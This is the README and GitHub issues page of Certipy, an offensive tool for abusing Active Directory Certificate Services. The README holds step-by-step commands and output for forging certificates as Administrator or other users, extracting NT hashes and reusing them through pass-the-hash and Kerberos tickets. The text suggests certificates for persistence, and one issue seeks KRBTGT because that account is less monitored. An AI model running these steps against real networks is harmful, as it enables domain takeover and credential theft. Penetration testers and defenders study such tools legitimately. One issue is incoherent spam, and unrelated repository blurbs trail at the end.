Python implementation for Active Directory certificate abuse

Overview

Certipy

Certipy is a Python tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).

Based on the C# variant Certify from @harmj0y and @tifkin_.

Table Of Contents

Installation

$ python3 setup.py install

Remember to add the Python scripts directory to your path.

Usage

$ certipy -h
usage: certipy [-h] [-debug] [-target-ip ip address] [-nameserver nameserver] [-dns-tcp] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-dc-ip ip address]
               target {find,req,auth,auto} ...

Active Directory certificate abuse

positional arguments:
  target                [[domain/]username[:password]@]<target name or address>
  {find,req,auth,auto}  Action
    find                Find certificate templates
    req                 Request a new certificate
    auth                Authenticate with a certificate
    auto                Automatically abuse certificate templates for privilege escalation

optional arguments:
  -h, --help            show this help message and exit
  -debug                Turn DEBUG output ON
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials
                        cannot be found, it will use the ones specified in the command line
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter

connection:
  -target-ip ip address
                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the
                        NetBIOS name and you cannot resolve it
  -nameserver nameserver
                        Nameserver for DNS resolution
  -dns-tcp              Use TCP instead of UDP for DNS queries

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH

Examples

Auto

Automatically abuse certificate templates for privilege escalation. This action will try to find, request and authenticate as the Administrator user. Upon success, a credential cache will be saved and the NT hash will be decrypted from the PAC in the TGS_REP.

To demonstrate how easy it is to misconfigure certificate templates, the default certificate template Web Server has been copied to Copy of Web Server. The only change was that the EKU Server Authentication was removed and that authenticated users are allowed to enroll. This will allow enrollees to specify the subject and use it for client authentication, i.e. authenticate as any user. If no EKUs are specified, then the certificate can be used for all purposes. Alternatively, one could add the Client Authentication EKU.

In this example, the user john is a low privileged user who is allowed to enroll for the Copy of Web Server template.

$ certipy 'predator/john:[email protected]' auto
[*] Trying template 'Copy of Web Server' with CA 'predator-DC-CA'
[*] Generating RSA key
[*] Requesting certificate
[*] Request success
[*] Got certificate with UPN 'Administrator'
[*] Saved certificate to '1.crt'
[*] Saved private key to '1.key'
[*] Using UPN: '[email protected]'
[*] Trying to get TGT...
[*] Saved credential cache to 'Administrator.ccache'
[*] Trying to retrieve NT hash for '[email protected]'
[*] Got NT hash for '[email protected]': fc525c9683e8fe067095ba2ddc971889

By default, the user Administrator is chosen. Use the -user parameter to create a certificate for another user.

Find

The find action will find certificate templates that are enabled by one or more CAs.

Find vulnerable templates

Use the -vulnerable parameter to only find vulnerable certificate templates.

$ certipy 'predator/john:[email protected]' find -vulnerable
[*] Finding vulnerable certificate templates for 'john'
User
  Name                                  : predator\john
  Groups                                : 
Certificate Authorities
  0
    CA Name                             : predator-DC-CA
    DNS Name                            : dc.predator.local
    Certificate Subject                 : CN=predator-DC-CA, DC=predator, DC=local
    Certificate Serial Number           : 1976D0FEFCAFC9A84D02D305FA88D84D
    Certificate Validity Start          : 2021-10-06 11:32:01+00:00
    Certificate Validity End            : 2026-10-06 11:42:01+00:00
    User Specified SAN                  : Disabled
    CA Permissions
      Owner                             : BUILTIN\Administrator
      Access Rights
        ManageCertificates              : BUILTIN\Administrator
                                          predator\Domain Admins
                                          predator\Enterprise Admins
        ManageCa                        : BUILTIN\Administrator
                                          predator\Domain Admins
                                          predator\Enterprise Admins
        Enroll                          : Authenticated Users
Vulnerable Certificate Templates
  0
    CAs                                 : predator-DC-CA
    Template Name                       : Copy of Web Server
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Authorized Signatures Required      : 0
    Extended Key Usage                  : 
    Permissions
      Enrollment Permissions
        Enrollment Rights               : predator\Domain Admins
                                          predator\Enterprise Admins
                                          Authenticated Users
      Object Control Permissions
        Owner                           : predator\Administrator
        Write Owner Principals          : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
        Write Dacl Principals           : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
        Write Property Principals       : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
    Vulnerable Reasons                  : 'Authenticated Users' can enroll, enrollee supplies subject and template allows authentication
                                          'Authenticated Users' can enroll and template has dangerous EKU

Use the -user parameter to find vulnerable certificate templates for another user. By default, the current user will be used.

Find all templates

$ certipy 'predator/john:[email protected]' find
[*] Finding certificate templates for 'john'
User
  Name                                  : predator\john
  Groups                                : 
Certificate Authorities
  0
    CA Name                             : predator-DC-CA
    DNS Name                            : dc.predator.local
    Certificate Subject                 : CN=predator-DC-CA, DC=predator, DC=local
    Certificate Serial Number           : 1976D0FEFCAFC9A84D02D305FA88D84D
    Certificate Validity Start          : 2021-10-06 11:32:01+00:00
    Certificate Validity End            : 2026-10-06 11:42:01+00:00
    User Specified SAN                  : Disabled
    CA Permissions
      Owner                             : BUILTIN\Administrator
      Access Rights
        ManageCertificates              : BUILTIN\Administrator
                                          predator\Domain Admins
                                          predator\Enterprise Admins
        ManageCa                        : BUILTIN\Administrator
                                          predator\Domain Admins
                                          predator\Enterprise Admins
        Enroll                          : Authenticated Users
Certificate Templates
  0
    CAs                                 : predator-DC-CA
    Template Name                       : User
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Certificate Name Flag               : SubjectRequireDirectoryPath
                                          SubjectRequireEmail
                                          SubjectAltRequireEmail
                                          SubjectAltRequireUpn
    Enrollment Flag                     : AutoEnrollment
                                          PublishToDs
                                          IncludeSymmetricAlgorithms
    Authorized Signatures Required      : 0
    Extended Key Usage                  : Encrypting File System
                                          Secure Email
                                          Client Authentication
    Permissions
      Enrollment Permissions
        Enrollment Rights               : predator\Domain Admins
                                          predator\Domain Users
                                          predator\Enterprise Admins
      Object Control Permissions
        Owner                           : predator\Enterprise Admins
        Write Owner Principals          : predator\Domain Admins
                                          predator\Enterprise Admins
        Write Dacl Principals           : predator\Domain Admins
                                          predator\Enterprise Admins
        Write Property Principals       : predator\Domain Admins
                                          predator\Enterprise Admins
[...]
  11
    CAs                                 : predator-DC-CA
    Template Name                       : Copy of Web Server
    Validity Period                     : 2 years
    Renewal Period                      : 6 weeks
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Authorized Signatures Required      : 0
    Extended Key Usage                  : 
    Permissions
      Enrollment Permissions
        Enrollment Rights               : predator\Domain Admins
                                          predator\Enterprise Admins
                                          Authenticated Users
      Object Control Permissions
        Owner                           : predator\Administrator
        Write Owner Principals          : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
        Write Dacl Principals           : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator
        Write Property Principals       : predator\Domain Admins
                                          predator\Enterprise Admins
                                          predator\Administrator

Request

Request a new certificate from a certificate template. By default, the current user specified in the target parameter will be used.

Request as another user

To request a certificate as another user, use the -alt parameter. This only applies to certificate templates, where the enrollee specifies the subject, or when the CA allows the enrollee to specify a UPN, i.e. User Specified SAN is set to Enabled.

In this example, the user john is a low privileged user. The certificate template Copy of Web Server is a copy of the default Web Server template. The EKU Server Authentication was removed, such that the template has no EKUs (No EKUs = any purpose). The default Web Server template allows the enrollee to supply the subject.

john will request a certificate valid for authentication as jane. The CA predator-DC-CA has Copy of Web Server enabled.

$ certipy 'predator/john:[email protected]' req -template 'Copy of Web Server' -ca 'predator-DC-CA' -alt 'jane'
[*] Generating RSA key
[*] Requesting certificate
[*] Request success
[*] Got certificate with UPN 'jane'
[*] Saved certificate to '2.crt'
[*] Saved private key to '2.key'

The certificate and key will be DER encoded and saved to .(crt|key) , where request ID is returned by the server.

Request as self

It is also possible to request a certificate for the current user. This is a good option for persistence since a certificate is not affected by password changes. By default, domain users are allowed to enroll in the default User template.

$ certipy 'predator/john:[email protected]' req -template 'User' -ca 'predator-DC-CA'
[*] Generating RSA key
[*] Requesting certificate
[*] Request success
[*] Got certificate with UPN '[email protected]'
[*] Saved certificate to '3.crt'
[*] Saved private key to '3.key'

Authenticate

The auth action will use the PKINIT Kerberos extension to authenticate with the provided certificate. The target user must be specified in the target parameter. If not specified, Certipy will try to extract the UPN from the certificate. The TGT will be saved in a credential cache to .ccache .

The NT hash will be extracted by using Kerberos U2U to request a TGS for the current user, where the encrypted PAC will contain the NT hash, which can be decrypted.

$ certipy 'predator/[email protected]' auth -cert ./2.crt -key ./2.key
[*] Using UPN: '[email protected]'
[*] Trying to get TGT...
[*] Saved credential cache to 'jane.ccache'
[*] Trying to retrieve NT hash for '[email protected]'
[*] Got NT hash for '[email protected]': 077cccc23f8ab7031726a3b70c694a49

Using the NT hash

You can simply pass-the-hash (PTH) for many services. For instance SMB:

$ impacket-smbclient -hashes :fc525c9683e8fe067095ba2ddc971889 'predator.local/[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

Type help for list of commands
# who
host:   \\172.16.19.1, user: administrator, active:     1, idle:     0

Using the credential cache

The credential cache currently holds a TGT. The TGT can be used to request TGSs for services. For instance, to request a TGS for the cifs (SMB) service at dc.predator.local:

$ # use TGT from Certipy
$ export KRB5CCNAME=./Administrator.ccache
$ # request TGS
$ impacket-getST -spn 'cifs/dc.predator.local' -dc-ip 172.16.19.100 -no-pass -k 'predator/administrator'
$ # use TGS from impacket-getST
$ export KRB5CCNAME=./administrator.ccache
$ # run smbclient with TGS (notice the FQDN)
$ impacket-smbclient -k -no-pass 'predator.local/[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

Type help for list of commands
# who
host:   \\172.16.19.1, user: Administrator, active:     1, idle:     0

Note that impacket-getST will overwrite the credential cache at .ccache . Create a copy of the credential cache from Certipy before requesting a TGS with impacket-getST.

Errors

Please submit any errors, issues, or questions under "Issues". A lot of errors can be caused by the user, tool, and target, but the error handling is not perfect.

Credits

Issues
  • Formatting question for

    Formatting question for "ESC1 - SAN Impersonation" attack

    Hello!

    I've got an environment where I've run the Certipy enumeration and have a template vulnerable to ESC1. I've requested a TGT for my "standard" user using GetTGT from impacket. And then I've launched Certipy as follows:

    certipy 'NETBIOS-NAME-OF-DOMAIN/[email protected]' -debug -dc-ip IP.OF.DOMAIN.CONTROLLER -k -no-pass req template 'VULNERABLETEMPLATE' -ca 'CA-NAME' -alt 'DOMAIN-ADMIN'
    

    When this runs, I get:

    [+] Trying to resolve 'VULN-CA-SERVER' at 'IP-OF-DC'
    [+] Connecting to SMB at 'VULN-CA-SERVER' 
    [+] Using Kerberos Cache: regularuser.ccache
    [+] SPN CIFS/[email protected] not found in cache
    [+] AnySPN is True, looking for another suitable SPN
    [+] SPN KRBTGT/[email protected] not found in cache
    [+] AnySPN is True, looking for another suitable SPN
    [+] No valid credentials found in cache.
    

    This is followed by a traceback and tons of python errors. Do I have a syntax error? I'm not sure what the expected output should look like.

    Thanks, Brian

    opened by braimee 7
  • resolve an issue if a user supplies an userPrincipleName (longer than…

    resolve an issue if a user supplies an userPrincipleName (longer than…

    resolve an issue if a user supplies an userPrincipleName (longer than 20 characters)

    The connection methods assumes a samAccountName(which is limited to 20 characters), in case of an user submitting an userPrincipleName, we need to limit its length to 20 characters in order to optain the samAccountName.

    opened by offensity 5
  • ESC2 and ESC3 -

    ESC2 and ESC3 - "The data is invalid. 0x8007000d (WIN32: 13 ERROR_INVALID_DATA)".

    Hi. I am testing the new version of your great tool. Unfortunately I get an error when testing the ESC2 and ESC3 attacks. Note that I can successfully exploit ESC1.

    ESC2 attack. The template "ESC2" is configured with the EKU "Any Purpose". First I request a certificate for domainuser1 (low priv.). The resutling certificate will act as the enrollment agent in the next step. esc2_1

    Then I use the file "domainuser1.pfx" to request a certificate for Administrator but then I get the error. The template "User" is configured as per default. Don't mind the different request IDs, I caused that. esc2_2

    ESC3 attack. The template "ESC3" is configured with the EKU "Certificate Request Agent". First I request a certificate for domainuser1 (low priv.). The resutling certificate will act as the enrollment agent in the next step. esc3_1

    Then I use the file "domainuser1.pfx" to request a certificate for Administrator but then I get the error. The template "User" is configured as per default. Again, don't mind the different request IDs... esc3_2

    opened by jsdhasfedssad 5
  • ValueError: nameserver None is not an IP address or valid https URL

    ValueError: nameserver None is not an IP address or valid https URL

    Hello! I'm trying to dump the AD with bloodhound and the find action, but I have this error. Tested on a recently install Kali Linux 2022.1 with Python 3.9.10

    -] Got error: nameserver None is not an IP address or valid https URL Traceback (most recent call last): File "/usr/lib/python3/dist-packages/dns/resolver.py", line 982, in nameservers raise NotImplementedError NotImplementedError

    and the command is: certipy find 'domain/user:[email protected]' -debug -bloodhound I have tried with thr fqdn and name only of the DC with the same results. If I ping using the names, works without issues.

    Thanks in advance.

    opened by proyecto-gemyn 5
  • TypeError: 'type' object is not subscriptable

    TypeError: 'type' object is not subscriptable

    I installed as local user on Windows 10 using Python38. I tried running 'certipy -h' and this error resulted. Please advise. Full console output:

    Traceback (most recent call last): File "C:\Users<redacted>\AppData\Roaming\Python\Python38\Scripts\certipy-script.py", line 33, in sys.exit(load_entry_point('Certipy==0.2', 'console_scripts', 'certipy')()) File "C:\Users<redacted>\AppData\Roaming\Python\Python38\Scripts\certipy-script.py", line 25, in importlib_load_entry_point return next(matches).load() File "C:\Program Files\Python38\lib\importlib\metadata.py", line 77, in load module = import_module(match.group('module')) File "C:\Program Files\Python38\lib\importlib_init_.py", line 127, in import_module return _bootstrap._gcd_import(name[level:], package, level) File "", line 1014, in _gcd_import File "", line 991, in _find_and_load File "", line 975, in _find_and_load_unlocked File "", line 655, in _load_unlocked File "", line 618, in _load_backward_compatible File "", line 259, in load_module File "C:\Users<redacted>\AppData\Roaming\Python\Python38\site-packages\certipy-0.2-py3.8.egg\certipy\entry.py", line 16, in File "", line 991, in _find_and_load File "", line 975, in _find_and_load_unlocked File "", line 655, in _load_unlocked File "", line 618, in _load_backward_compatible File "", line 259, in load_module File "C:\Users<redacted>\AppData\Roaming\Python\Python38\site-packages\certipy-0.2-py3.8.egg\certipy\auto.py", line 17, in File "", line 991, in _find_and_load File "", line 975, in _find_and_load_unlocked File "", line 655, in _load_unlocked File "", line 618, in _load_backward_compatible File "", line 259, in load_module File "C:\Users<redacted>\AppData\Roaming\Python\Python38\site-packages\certipy-0.2-py3.8.egg\certipy\find.py", line 25, in File "", line 991, in _find_and_load File "", line 975, in _find_and_load_unlocked File "", line 655, in _load_unlocked File "", line 618, in _load_backward_compatible File "", line 259, in load_module File "C:\Users<redacted>\AppData\Roaming\Python\Python38\site-packages\certipy-0.2-py3.8.egg\certipy\constants.py", line 20, in File "", line 991, in _find_and_load File "", line 975, in _find_and_load_unlocked File "", line 655, in _load_unlocked File "", line 618, in _load_backward_compatible File "", line 259, in load_module File "C:\Users<redacted>\AppData\Roaming\Python\Python38\site-packages\certipy-0.2-py3.8.egg\certipy\structs.py", line 12, in File "", line 991, in _find_and_load File "", line 975, in _find_and_load_unlocked File "", line 655, in _load_unlocked File "", line 618, in _load_backward_compatible File "", line 259, in load_module File "C:\Users<redacted>\AppData\Roaming\Python\Python38\site-packages\certipy-0.2-py3.8.egg\certipy\formatting.py", line 11, in TypeError: 'type' object is not subscriptable

    opened by bill-e-ghote 4
  • "UnboundLocalError: local variable 'tgt' referenced before assignment" error when requesting a TGT for the Kerberos account KRBTGT

    Hi,

    At the top of the below screenshot you can see a successful request for a certificate for the Kerberos account KRBTGT. However, when attempting to authenticate using that certificate in order to get the NT hash of the account, the error "UnboundLocalError: local variable 'tgt' referenced before assignment" occurs.

    At the bottom of the screenshot you see the same but for the account Administrator which works.

    It would be nice to be able to target the Kerberos account since that is typically less monitored and its password is typically rarely changed.

    Thanks!

    image

    bug good first issue 
    opened by jsdhasfeds 4
  • "argument of type 'NoneType' is not iterable" for enabled templates

    Hi,

    First of all, thanks for your awesome tool. I'm trying to use it but I get the following error. Any idea on what could be going wrong ?

    └─# 
    Certipy v2.0.5 - by Oliver Lyak (ly4k)
    
    [*] Finding certificate templates
    [+] Authenticating to LDAP server
    [+] Authenticating to LDAP server
    [+] Bound to ldaps://192.168.x.x - ssl
    [+] Default path: DC=domain,DC=local
    [+] Configuration path: CN=Configuration,DC=domain,DC=local
    [*] Found 33 certificate templates
    [*] Finding certificate authorities
    [*] Found 2 certificate authorities
    [-] Got error: argument of type 'NoneType' is not iterable
    Traceback (most recent call last):
      File "/usr/local/lib/python3.9/dist-packages/Certipy-2.0.5-py3.9.egg/certipy/entry.py", line 62, in main
        actions[options.action](options)
      File "/usr/local/lib/python3.9/dist-packages/Certipy-2.0.5-py3.9.egg/certipy/find.py", line 734, in entry
        find.find()
      File "/usr/local/lib/python3.9/dist-packages/Certipy-2.0.5-py3.9.egg/certipy/find.py", line 145, in find
        if template.get("name") in templates:
    TypeError: argument of type 'NoneType' is not iterable
    
    opened by frisch-raphael 4
  • TypeError: 'type' object is not subscriptable

    TypeError: 'type' object is not subscriptable

    When running certipy I'm getting the following:

    # certipy
    Traceback (most recent call last):
      File "/usr/local/bin/certipy", line 11, in <module>
        load_entry_point('Certipy==2.0', 'console_scripts', 'certipy')()
      File "/usr/lib/python3/dist-packages/pkg_resources/__init__.py", line 490, in load_entry_point
        return get_distribution(dist).load_entry_point(group, name)
      File "/usr/lib/python3/dist-packages/pkg_resources/__init__.py", line 2854, in load_entry_point
        return ep.load()
      File "/usr/lib/python3/dist-packages/pkg_resources/__init__.py", line 2445, in load
        return self.resolve()
      File "/usr/lib/python3/dist-packages/pkg_resources/__init__.py", line 2451, in resolve
        module = __import__(self.module_name, fromlist=['__name__'], level=0)
      File "/usr/local/lib/python3.8/dist-packages/Certipy-2.0-py3.8.egg/certipy/entry.py", line 8, in <module>
        from certipy import auth, ca, find, forge, relay, request, shadow, template, version
      File "/usr/local/lib/python3.8/dist-packages/Certipy-2.0-py3.8.egg/certipy/shadow.py", line 22, in <module>
        class Shadow:
      File "/usr/local/lib/python3.8/dist-packages/Certipy-2.0-py3.8.egg/certipy/shadow.py", line 54, in Shadow
        def get_key_credentials(self, target_dn: str, user: LDAPEntry) -> list[bytes]:
    TypeError: 'type' object is not subscriptable
    
    
    opened by mubix 4
  • Another command syntax question re

    Another command syntax question re "ESC1 - SAN impersonation" attack

    Hi again,

    I raised this issue and it was determined the certificate service was not running on my CA.

    On a second CA in the same environment, Certipy identified it as being vulnerable to ESC1 - SAN impersonation attack. Specifically, Domain Computers can enroll. I used Powermad to create a "ghost" computer object. Then I used GetTGT from Impacket and issued export KRB5CCNAME=ghost-machine.cache.. I also verified with rpcdump that certsrv.exe is running.

    Now I'm trying to run with Certipy is as follows:

    certipy 'domain.com/[email protected] -debug -dc-ip IP.OF.DOMAIN.CONTROLLER -k -no-pass req -template 'TEMPLATE' -ca 'CA-NAME-AND-*NOT*-THE-DNS-NAME' -altname 'Administrator'
    

    When I do, I basically get the same output as issue 19 with a long traceback that ends in:

    impacket.smbconnection.SessionError: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
    

    Again, the difference this time around is I believe the certificate services are running so I'm not sure why my attempts are not successful. Could you please help?

    Thanks, Brian

    opened by braimee 4
  • Tag releases

    Tag releases

    Could you please tag the source? This allows distributions to get the complete source from GitHub and version the packages properly (e.g., https://github.com/NixOS/nixpkgs/pull/145126).

    Thanks

    opened by fabaff 4
  • AttributeError: 'Namespace' object has no attribute 'json'

    AttributeError: 'Namespace' object has no attribute 'json'

    Please tell me, my current environment is python3.9, when executed, Certipy 'test/join:[email protected]' auto, the following error appears, is there any solution?

    Traceback (most recent call last): File "/usr/local/bin/certipy", line 33, in sys.exit(load_entry_point('Certipy==0.2', 'console_scripts', 'certipy')()) File "/usr/local/lib/python3.9/dist-packages/Certipy-0.2-py3.9.egg/certipy/entry.py", line 176, in main File "/usr/local/lib/python3.9/dist-packages/Certipy-0.2-py3.9.egg/certipy/auto.py", line 29, in auto File "/usr/local/lib/python3.9/dist-packages/Certipy-0.2-py3.9.egg/certipy/find.py", line 474, in init AttributeError: 'Namespace' object has no attribute 'json'

    opened by helloyw 4
  • Missing continue in exception (find)

    Missing continue in exception (find)

    If exception is fired looping through enrollment_services, EnrollmentService constructor should not be called as it will certainly also crash.

    opened by brouillamini 3
  • consolidate vulnerable reasons for has vulnerable acl

    consolidate vulnerable reasons for has vulnerable acl

    Currently the has_vulnerable_acl is the only method adding multiple entries into _vulnerable_reasons for the same reason (with different usernames)

    opened by offensity 3
  • Which abuse scenarious are supported by this tool?

    Which abuse scenarious are supported by this tool?

    Hi. Thank you very much for your effort writing this tool. I have successfully used it in the scenarios with technique IDs ESC1 and ESC2 in Will Schroeder's and Lee Christensen's whitepaper. Both manually and automatically. I have a few questions:

    1. In automatic mode, can you force the use of a specific certificate template? This is not really needed but could be valuable in penetration testing reports in order to "prove" that specific templates are vulnerable. I could of course abuse them manually but now that your tool has this nice automatic feature I want to use that :)

    2. Which other scenarious are supported by this tool? For example technique ID ESC6. If not, are you planning to implement this? FYI. Certi.py does not support ESC6 which forces you to use Rubeus on a domain-joined machine which is far from optimal and not something I really want to do.

    opened by jsdhasfeds 2
  • Fix type cast v2

    Fix type cast v2

    list -> List

    opened by mubix 2
  • RRP SessionError: code 0x2

    RRP SessionError: code 0x2

    Hi, I just tried certipy and I have some issues to find and get bloodhound output. It correctly finds multiple certificate templates and 4 certificate authorities, then tries to connect to all of them, 3 work, and one fails with the following:

    [-] Got error: RRP SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND - The system cannot find the file specified.
    Traceback (most recent call last):
      File "C:\Users\username\.virtualenvs\Certipy-q9BFJWE2\lib\site-packages\certipy\entry.py", line 62, in main
        actions[options.action](options)
      File "C:\Users\username\.virtualenvs\Certipy-q9BFJWE2\lib\site-packages\certipy\find.py", line 813, in entry
        find.find()
      File "C:\Users\username\.virtualenvs\Certipy-q9BFJWE2\lib\site-packages\certipy\find.py", line 156, in find
        edit_flags, request_disposition, security = self.get_ca_security(
      File "C:\Users\username\.virtualenvs\Certipy-q9BFJWE2\lib\site-packages\certipy\find.py", line 686, in get_ca_security
        policy_key = rrp.hBaseRegOpenKey(
      File "C:\Users\username\.virtualenvs\Certipy-q9BFJWE2\lib\site-packages\impacket-0.9.24-py3.10.egg\impacket\dcerpc\v5\rrp.py", line 874, in hBaseRegOpenKey
        return dce.request(request)
      File "C:\Users\username\.virtualenvs\Certipy-q9BFJWE2\lib\site-packages\impacket-0.9.24-py3.10.egg\impacket\dcerpc\v5\rpcrt.py", line 880, in request
        raise exception
    impacket.dcerpc.v5.rrp.DCERPCSessionError: RRP SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND - The system cannot find the file specified.
    

    The CA server has to do something with skype for business I guess, don't know if that helps.

    Does it actually have to enumerate all servers?

    opened by CT-H00K 2
  • Fix: 'Namespace' object has no attribute 'json'

    Fix: 'Namespace' object has no attribute 'json'

    When running the script with the auto mode, a Find object is created without the -json parameter. Hence, the attribute isn't present in the argsparse namespace. A check is needed to differenciate when launched in find mode or auto mode. Here is the stacktrace: image

    This is a quickfix by looking before if the object options has a json attribute. It seems to be the only occurence of checking the self.options.json object when launched in the auto mode, so it could also be done by modifying the next line like so :

    if hasattr(self.options, "json") and self.options.json
    

    I don't know, you tell me !

    opened by Clayno 1
  • Fallback on default naming context when root naming context not avail…

    Fallback on default naming context when root naming context not avail…

    …able

    When querying, the root naming context (top level domain) is used instead of the default one. In some cases, such as a child domain in a forest, we don't have access to the root domain, so trying to query the root naming context will result in raising an error: "Could not find domain DC=contenso,DC=com".

    Here we still try to go for the root domain, but fallback on the default if it doesn't work. It may be nice to also add an option to specify the path we want to work with.

    opened by Clayno 1
  • LDAP.py fails with SSL error

    LDAP.py fails with SSL error

    With Python 3.7, 3.8 and 3.9, Certipy fails with SSL errors originating from ldap.py.

    This seems to be similar to the this issuewith Impacket. Is there a quick fix?

    [email protected]:/home/user# certipy domain.org/[email protected] find
    Password:
    Traceback (most recent call last):
      File "/usr/local/bin/certipy", line 11, in <module>
        load_entry_point('Certipy==0.2', 'console_scripts', 'certipy')()
      File "/usr/local/lib/python3.9/dist-packages/Certipy-0.2-py3.9.egg/certipy/entry.py", line 170, in main
      File "/usr/local/lib/python3.9/dist-packages/Certipy-0.2-py3.9.egg/certipy/find.py", line 846, in find
      File "/usr/local/lib/python3.9/dist-packages/Certipy-0.2-py3.9.egg/certipy/find.py", line 506, in run
      File "/usr/local/lib/python3.9/dist-packages/Certipy-0.2-py3.9.egg/certipy/find.py", line 495, in connect
      File "/usr/local/lib/python3.9/dist-packages/Certipy-0.2-py3.9.egg/certipy/ldap.py", line 72, in connect
      File "/usr/local/lib/python3.9/dist-packages/impacket/ldap/ldap.py", line 122, in __init__
        self._socket.do_handshake()
      File "/usr/lib/python3/dist-packages/OpenSSL/SSL.py", line 1915, in do_handshake
        self._raise_ssl_error(self._ssl, result)
      File "/usr/lib/python3/dist-packages/OpenSSL/SSL.py", line 1647, in _raise_ssl_error
        _raise_current_error()
      File "/usr/lib/python3/dist-packages/OpenSSL/_util.py", line 54, in exception_from_error_queue
        raise exception_type(errors)
    OpenSSL.SSL.Error: [('SSL routines', 'state_machine', 'internal error')]
    opened by ssabetan 1
  • Implement esc3 as seperate issue

    Implement esc3 as seperate issue

    Hi,

    I created a new pull request and cleaned merge history to avoid conflicts and provide clean diffs.

    You wrote in the last pull request:

    Thank you for your PR. First of all, there are some merge conflicts that needs to be resolved; I apologize if the mistake happened on my end. Secondly, this PR will give a false positive for the "auto" feature as the certificate is marked as vulnerable without the method being implemented to exploit. It will fail and continue with other certificate templates, but perhaps there is a better way to inform the user that the certificate might be vulnerable without automatically trying to exploit it in the "auto" feature.

    The exact same issue should already happen before:

    image As you can see here, certificates with "Certificate Request Agent" eku were already reported before. I just moved this detection outside of has_dangerous_eku to have a better distinction as they are quite different to exploit.

    The autoexploit function also fails for vulnerable_acl or owner_sid (ESC4) type vulnerabilities.

    I would therefore suggest to merge this merge request, as their is no impact for "auto" (same issue was there before) and it now allows to reliable filter on different vulnerability types.

    So one could add a new check here: image and filter certificate_template._vulnerable_technique_ids for implemented types.

    opened by offensity 1
  • Implement ESC6 in certificate templates is vulnerable

    Implement ESC6 in certificate templates is vulnerable

    ESC6 is currently only discovered in auto, added it to find -vulnerable as well.

    Function is now implement in certificate template

    opened by offensity 1
  • Implement esc3 as seperate issue

    Implement esc3 as seperate issue

    ESC3 is currently reported together with ESC2, but they are quite different, splitted them up

    Please be aware that add technique ids from paper to output #6 should be merged first, as this commit depends on it

    opened by offensity 1
  • ModuleNotFoundError: No module named 'impacket.examples.utils'

    ModuleNotFoundError: No module named 'impacket.examples.utils'

    I get this error message when I run certipy.

    ModuleNotFoundError: No module named 'impacket.examples.utils'

    New kali (2022.1), new impacket (0.9,24-1)

    opened by hawaii67 1
  • Fix error when no certificate templates are configured

    Fix error when no certificate templates are configured

    Hey,

    There is an error in the find module when no templates are configured on a CA. As such, the certificateTemplates attribute does not exist and it breaks the parsing. Here is the stacktrace:

    image

    I added a quick workaround, tell me if it's okay with you.

    opened by Clayno 1
  • add json output flag to find command

    add json output flag to find command

    Add a new json output to find command

    opened by offensity 1
  • Add esc6 to find

    Add esc6 to find

    opened by offensity 1
  • add technique ids from paper to output

    add technique ids from paper to output

    To ease reference to the paper Certified_Pre-Owned, add the corresponding classes to the output.

    image

    opened by offensity 1
  • Zow

    Zow

    My shadow account seems to have been hacked by the united states navy.

    Office Depot seems to have called me a pedo in th culprit of the attack, north Korea. From india. And Egypt a black girl has called sucking a white iraqis duck genocide.

    opened by THELEMITED 0
  • Dumping the AD for import into Bloodhound fails using low priv. accounts in 2.0.4

    Dumping the AD for import into Bloodhound fails using low priv. accounts in 2.0.4

    I can successfully dump my AD for import into Bloodhound using 2.0.1 and a low .priv account. dump_working

    When I try this in 2.0.4 using the same low priv. account as above and the same AD this partially fails. dump_failing

    When I use the account domainadmin1 (high priv.) dumping works in 2.0.4. dump_working2

    Is all of this intentionally? If not something seems to have broken.

    opened by jsdhasfedssad 2
Releases(2.0.6)
Owner
Oliver Lyak
Security Researcher
Previously known as @ollypwn
Oliver Lyak
User management system (UMS), has the primary purpose of connecting to an Active Directory (AD)

?? Sistema de Gerenciamento de Usuário (SGU) ?? Sobre o projeto Sistema de gerenciamento de usuários (SGU), tem o objetivo primário de se conectar a u

Patrick Viegas 2 Feb 12, 2022
Automate your Microsoft Learn Student Ambassadors event certificate with Python

Microsoft Learn Student Ambassador Certificate Automation This repo simply use a template certificate docx file and generates certificates both docx a

Muhammed Oğuz 23 Feb 21, 2022
Python client SDK designed to simplify integrations by automating key generation and certificate enrollment using Venafi machine identity services.

This open source project is community-supported. To report a problem or share an idea, use Issues; and if you have a suggestion for fixing the issue,

Venafi, Inc. 9 Dec 7, 2021
Subcert is an subdomain enumeration tool, that finds all the subdomains from certificate transparency logs.

Subcert Subcert is a subdomain enumeration tool, that finds all the valid subdomains from certificate transparency logs. Table of contents Setup Demo

A3h1nt 52 Jan 6, 2022
Automatic certificate unpinning for Android apps

What is this? Script used to perform automatic certificate unpinning of an APK by adding a custom network security configuration that permits user-add

Antoine Neuenschwander 5 Jul 28, 2021
A blazing fast mass certificate generator script for the community ⚡

A simple mass certificate generator script for the community ⚡ Source Code · Docs · Raw Script Docs All you need Certificate Design a simple template

Tushar Nankani 16 Feb 17, 2022
Python plugin/extra to load data files from an external source (such as AWS S3) to a local directory

Data Loader Plugin - Python Table of Content (ToC) Data Loader Plugin - Python Table of Content (ToC) Overview References Python module Python virtual

Cloud Helpers 2 Jan 10, 2022
This Python library searches through a static directory and appends artist, title, track number, album title, duration, and genre to a .json object

